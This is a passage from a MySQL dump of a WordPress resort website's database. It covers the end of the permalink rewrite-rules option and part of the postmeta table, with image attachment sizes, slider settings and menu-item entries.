p?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:32:\"([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:19:\"([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";s:27:\"[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\"[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"([^/]+)/embed/?$\";s:37:\"index.php?name=$matches[1]&embed=true\";s:20:\"([^/]+)/trackback/?$\";s:31:\"index.php?name=$matches[1]&tb=1\";s:40:\"([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:35:\"([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:28:\"([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&paged=$matches[2]\";s:35:\"([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&cpage=$matches[2]\";s:24:\"([^/]+)(?:/([0-9]+))?/?$\";s:43:\"index.php?name=$matches[1]&page=$matches[2]\";s:16:\"[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:26:\"[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:46:\"[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:22:\"[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";}','yes');
/*!40000 ALTER TABLE `ar_options` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_postmeta`
--

DROP TABLE IF EXISTS `ar_postmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_postmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `post_id` (`post_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=3172 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_postmeta`
--

LOCK TABLES `ar_postmeta` WRITE;
/*!40000 ALTER TABLE `ar_postmeta` DISABLE KEYS */;
INSERT INTO `ar_postmeta` VALUES (1,2,'_wp_page_template','home-panels.php'),(18,10,'_wp_attached_file','2016/03/water2-1.jpg'),(19,10,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2000;s:6:\"height\";i:2000;s:4:\"file\";s:20:\"2016/03/water2-1.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"water2-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"water2-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"water2-1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"water2-1-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"servicethumb\";a:4:{s:4:\"file\";s:20:\"water2-1-300x160.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"slidethumb\";a:4:{s:4:\"file\";s:19:\"water2-1-100x75.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:75;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"slideimage\";a:4:{s:4:\"file\";s:20:\"water2-1-950x460.jpg\";s:5:\"width\";i:950;s:6:\"height\";i:460;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"blogthumb\";a:4:{s:4:\"file\";s:20:\"water2-1-650x300.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(20,10,'_wp_attachment_is_custom_background','university'),(21,11,'_wp_attached_file','2016/03/logoSmall-e1467334854527.png'),(22,11,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:100;s:6:\"height\";i:168;s:4:\"file\";s:36:\"2016/03/logoSmall-e1467334854527.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"logoSmall-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"servicethumb\";a:4:{s:4:\"file\";s:21:\"logoSmall-150x160.png\";s:5:\"width\";i:150;s:6:\"height\";i:160;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"slidethumb\";a:4:{s:4:\"file\";s:20:\"logoSmall-100x75.png\";s:5:\"width\";i:100;s:6:\"height\";i:75;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23,12,'_edit_last','2'),(24,12,'_wp_page_template','default'),(33,12,'_edit_lock','1588625037:3'),(34,15,'_menu_item_type','post_type'),(35,15,'_menu_item_menu_item_parent','41'),(36,15,'_menu_item_object_id','12'),(37,15,'_menu_item_object','page'),(38,15,'_menu_item_target',''),(39,15,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(40,15,'_menu_item_xfn',''),(41,15,'_menu_item_url',''),(52,17,'ml-slider_settings','a:35:{s:4:\"type\";s:4:\"flex\";s:6:\"random\";s:5:\"false\";s:8:\"cssClass\";s:0:\"\";s:8:\"printCss\";s:4:\"true\";s:7:\"printJs\";s:4:\"true\";s:5:\"width\";s:3:\"700\";s:6:\"height\";s:3:\"300\";s:3:\"spw\";s:1:\"7\";s:3:\"sph\";s:1:\"5\";s:5:\"delay\";s:4:\"3000\";s:6:\"sDelay\";i:30;s:7:\"opacity\";d:0.6999999999999999555910790149937383830547332763671875;s:10:\"titleSpeed\";i:500;s:6:\"effect\";s:4:\"fade\";s:10:\"navigation\";s:5:\"false\";s:5:\"links\";s:4:\"true\";s:10:\"hoverPause\";s:4:\"true\";s:5:\"theme\";s:7:\"default\";s:9:\"direction\";s:10:\"horizontal\";s:7:\"reverse\";s:5:\"false\";s:14:\"animationSpeed\";s:3:\"600\";s:8:\"prevText\";s:1:\"<\";s:8:\"nextText\";s:1:\">\";s:6:\"slices\";s:2:\"15\";s:6:\"center\";s:5:\"false\";s:9:\"smartCrop\";s:4:\"true\";s:12:\"carouselMode\";s:5:\"false\";s:14:\"carouselMargin\";s:1:\"5\";s:6:\"easing\";s:6:\"linear\";s:8:\"autoPlay\";s:4:\"true\";s:11:\"thumb_width\";i:150;s:12:\"thumb_height\";i:100;s:9:\"fullWidth\";s:5:\"false\";s:10:\"noConflict\";s:5:\"false\";s:12:\"smoothHeight\";s:5:\"false\";}'),(57,2,'_edit_lock','1559652669:2'),(58,2,'_edit_last','1'),(61,21,'_wp_attached_file','2016/03/AshbyAir.jpg'),(62,21,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:999;s:6:\"height\";i:590;s:4:\"file\";s:20:\"2016/03/AshbyAir.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"AshbyAir-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"AshbyAir-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"AshbyAir-768x454.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:454;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"servicethumb\";a:4:{s:4:\"file\";s:20:\"AshbyAir-300x160.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"slidethumb\";a:4:{s:4:\"file\";s:19:\"AshbyAir-100x75.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:75;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"slideimage\";a:4:{s:4:\"file\";s:20:\"AshbyAir-950x460.jpg\";s:5:\"width\";i:950;s:6:\"height\";i:460;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"blogthumb\";a:4:{s:4:\"file\";s:20:\"AshbyAir-650x300.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(63,21,'ml-slider_type','image'),(64,21,'_wp_attachment_backup_sizes','a:1:{s:15:\"resized-700x300\";a:5:{s:4:\"path\";s:93:\"/home/expcom5/public_html/ashbyresort.com/dir/wp-content/uploads/2016/03/AshbyAir-700x300.jpg\";s:4:\"file\";s:20:\"AshbyAir-700x300.jpg\";s:5:\"width\";i:700;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(65,21,'ml-slider_crop_position','center-center'),(66,21,'_wp_attachment_image_alt',''),(67,2,'vantage_metaslider_slider','meta:17'),(68,2,'vantage_metaslider_slider_stretch','1'),(69,22,'_wp_attached_file','2016/03/water2Header.jpg'),(70,22,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2000;s:6:\"height\";i:444;s:4:\"file\";s:24:\"2016/03/water2Header.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"water2Header-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"water2Header-300x67.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:67;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"water2Header-768x170.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:170;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"water2Header-1024x227.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:227;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:24:\"water2Header-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:25:\"water2Header-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:24:\"water2Header-960x444.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:444;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:24:\"water2Header-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:24:\"water2Header-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(77,25,'_wp_attached_file','2016/03/IMG_7500.jpg'),(78,25,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:4272;s:6:\"height\";i:2848;s:4:\"file\";s:20:\"2016/03/IMG_7500.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_7500-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_7500-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_7500-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_7500-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"IMG_7500-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"IMG_7500-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_7500-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"IMG_7500-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"IMG_7500-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"IMG_7500-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"IMG_7500-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:18:\"Canon EOS REBEL T3\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1441465861\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"75\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.001\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(79,25,'ml-slider_type','image'),(80,25,'_wp_attachment_backup_sizes','a:1:{s:15:\"resized-700x300\";a:5:{s:4:\"path\";s:93:\"/home/expcom5/public_html/ashbyresort.com/dir/wp-content/uploads/2016/03/IMG_7500-700x300.jpg\";s:4:\"file\";s:20:\"IMG_7500-700x300.jpg\";s:5:\"width\";i:700;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(83,25,'ml-slider_crop_position','center-center'),(84,25,'_wp_attachment_image_alt',''),(85,26,'_wp_attached_file','2016/03/fishingsunset.jpg'),(86,26,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:25:\"2016/03/fishingsunset.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"fishingsunset-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"fishingsunset-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:25:\"fishingsunset-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:25:\"fishingsunset-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:25:\"fishingsunset-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:25:\"fishingsunset-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:25:\"fishingsunset-640x480.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:25:\"fishingsunset-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:25:\"fishingsunset-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1178653166\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"34\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:8:\"0.003125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(87,26,'ml-slider_type','image'),(88,26,'_wp_attachment_backup_sizes','a:1:{s:15:\"resized-640x274\";a:5:{s:4:\"path\";s:98:\"/home/expcom5/public_html/ashbyresort.com/dir/wp-content/uploads/2016/03/fishingsunset-640x274.jpg\";s:4:\"file\";s:25:\"fishingsunset-640x274.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:274;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(89,26,'ml-slider_crop_position','center-center'),(90,26,'_wp_attachment_image_alt',''),(109,30,'_wp_attached_file','2016/03/swimmers3-1.jpg'),(110,30,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2199;s:6:\"height\";i:982;s:4:\"file\";s:23:\"2016/03/swimmers3-1.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"swimmers3-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"swimmers3-1-300x134.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:134;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"swimmers3-1-768x343.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:343;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"swimmers3-1-1024x457.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:457;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:23:\"swimmers3-1-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:23:\"swimmers3-1-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:23:\"swimmers3-1-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:24:\"swimmers3-1-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:23:\"swimmers3-1-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:23:\"swimmers3-1-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:23:\"swimmers3-1-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(111,30,'ml-slider_type','image'),(112,30,'_wp_attachment_backup_sizes','a:1:{s:15:\"resized-700x300\";a:5:{s:4:\"path\";s:96:\"/home/expcom5/public_html/ashbyresort.com/dir/wp-content/uploads/2016/03/swimmers3-1-700x300.jpg\";s:4:\"file\";s:23:\"swimmers3-1-700x300.jpg\";s:5:\"width\";i:700;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(113,30,'ml-slider_crop_position','center-center'),(114,30,'_wp_attachment_image_alt',''),(115,31,'_edit_last','1'),(116,31,'_edit_lock','1554945732:1'),(117,31,'_wp_page_template','default'),(118,32,'vantage_metaslider_slider',''),(119,32,'vantage_metaslider_slider_stretch','1'),(120,32,'vantage_menu_icon',''),(121,32,'_menu_item_type','post_type'),(122,32,'_menu_item_menu_item_parent','0'),(123,32,'_menu_item_object_id','31'),(124,32,'_menu_item_object','page'),(125,32,'_menu_item_target',''),(126,32,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(127,32,'_menu_item_xfn',''),(128,32,'_menu_item_url',''),(129,31,'vantage_metaslider_slider',''),(130,31,'vantage_metaslider_slider_stretch','1'),(131,31,'vantage_menu_icon',''),(132,2,'vantage_menu_icon',''),(133,37,'_edit_last','1'),(134,37,'_edit_lock','1554780318:2'),(135,37,'_wp_page_template','default'),(136,38,'vantage_metaslider_slider',''),(137,38,'vantage_metaslider_slider_stretch','1'),(138,38,'vantage_menu_icon',''),(139,38,'_menu_item_type','post_type'),(140,38,'_menu_item_menu_item_parent','0'),(141,38,'_menu_item_object_id','37'),(142,38,'_menu_item_object','page'),(143,38,'_menu_item_target',''),(144,38,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(145,38,'_menu_item_xfn',''),(146,38,'_menu_item_url',''),(147,37,'vantage_metaslider_slider',''),(148,37,'vantage_metaslider_slider_stretch','1'),(149,37,'vantage_menu_icon',''),(150,40,'_edit_last','2'),(151,40,'_wp_page_template','default'),(152,41,'vantage_metaslider_slider',''),(153,41,'vantage_metaslider_slider_stretch','1'),(154,41,'vantage_menu_icon',''),(155,41,'_menu_item_type','post_type'),(156,41,'_menu_item_menu_item_parent','0'),(157,41,'_menu_item_object_id','40'),(158,41,'_menu_item_object','page'),(159,41,'_menu_item_target',''),(160,41,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(161,41,'_menu_item_xfn',''),(162,41,'_menu_item_url',''),(163,40,'vantage_metaslider_slider',''),(164,40,'vantage_metaslider_slider_stretch','1'),(165,40,'vantage_menu_icon',''),(166,40,'_edit_lock','1561664472:2'),(167,43,'_edit_last','3'),(168,43,'_wp_page_template','default'),(169,44,'vantage_metaslider_slider',''),(170,44,'vantage_metaslid